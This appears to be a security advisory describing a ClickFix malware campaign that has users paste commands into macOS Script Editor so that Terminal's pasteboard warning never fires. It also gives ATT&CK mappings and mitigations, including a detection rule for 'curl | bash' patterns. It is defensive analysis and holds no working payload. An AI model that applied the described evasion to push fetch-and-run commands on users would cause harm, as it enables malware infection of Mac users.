ClickFix Malware Campaign Evades macOS Defenses via Script Editor

Executive Summary

A ClickFix malware campaign has developed a novel method to circumvent critical security warnings in macOS Sequoia (15.x) and Sonoma (14.x). The threat actors have shifted from instructing victims to paste malicious commands directly into Terminal—a process now flagged by Apple's pasteboard protections—to using the built-in Script Editor application. This technique effectively bypasses system warnings, demonstrating an adaptive social engineering tactic that increases the risk of successful infection for Mac users.

Technical Analysis

According to analysis by Malwarebytes, the core of this evasion lies in exploiting the functional difference between Terminal and Script Editor. Starting with macOS Sonoma, Apple introduced a security feature that warns users when pasting a command into Terminal, specifically checking the pasteboard for known malicious patterns. The ClickFix campaign, which typically uses fake tech support pop-ups to lure victims, previously relied on victims pasting curl or bash commands directly into Terminal to download and execute payloads.

The new method instructs users to open Script Editor (located in /Applications/Utilities/), create a new document, and paste the malicious command there. The attacker's script then uses the do shell script AppleScript command to execute the pasted content. Critically, the pasteboard warning is tied to the Terminal application. Since Script Editor is not subject to the same pasteboard inspection, the malicious command executes without triggering Apple's built-in alert. The final execution chain typically involves downloading a second-stage payload, often a disguised installer package, from a compromised website.

Tactics, Techniques & Procedures

The campaign employs a consistent TTP matrix:

• Tactic: Initial Access (TA0001)
  • Technique: Drive-by Compromise (T1189): Victims encounter fake browser alerts or pop-ups claiming their system is infected or has a critical error.
  • Technique: User Execution (T1204): Social engineering lures users into following instructions to "fix" the non-existent problem.
• Tactic: Execution (TA0002)
  • Technique: Command and Scripting Interpreter (T1059): Abuse of macOS's Script Editor and the do shell script command to execute a malicious shell script.
  • Sub-technique: AppleScript (T1059.002): The primary execution mechanism within Script Editor.
• Tactic: Defense Evasion (TA0005)
  • Technique: Abuse Execution Guardrails (T1480): Specifically bypassing the pasteboard warning guardrail designed for Terminal.app.
  • Technique: Masquerading (T1036): Final payloads are often signed, illegitimate installer packages (.pkg files) posing as legitimate software.

Threat Actor Context

The threat actor behind these campaigns is tracked under the name ClickFix. This is not a sophisticated APT group but a financially motivated entity that operates large-scale, opportunistic social engineering campaigns. Their primary focus has been macOS users for several years, constantly iterating on delivery methods to overcome Apple's security improvements. Their persistence indicates a successful, profit-driven operation that adapts to the changing security landscape of the macOS platform.

Mitigations & Recommendations

1. User Education: This attack chain requires significant user interaction. Train users to be skeptical of unsolicited browser pop-ups warning of infections, especially those that provide phone numbers or direct technical instructions. Emphasize that legitimate Apple security warnings will not ask users to copy and paste commands.
2. Application Control: Use macOS's built-in Gatekeeper and consider supplemental endpoint security tools that can restrict execution of osascript or Script Editor from web-browser-derived processes, or that can flag do shell script commands containing curl | bash patterns.
3. Network Filtering: Implement outbound web filtering or DNS security to block connections to known malicious domains and newly registered domains (NRDs), which are commonly used in these campaigns for payload delivery.
4. Principle of Least Privilege: Ensure standard user accounts do not have administrative privileges. The final payload often requires a user password to install, providing a final opportunity to halt the infection.
5. Vigilance on Updates: While this technique bypasses a specific warning, keeping macOS fully updated ensures all other layered security protections are active.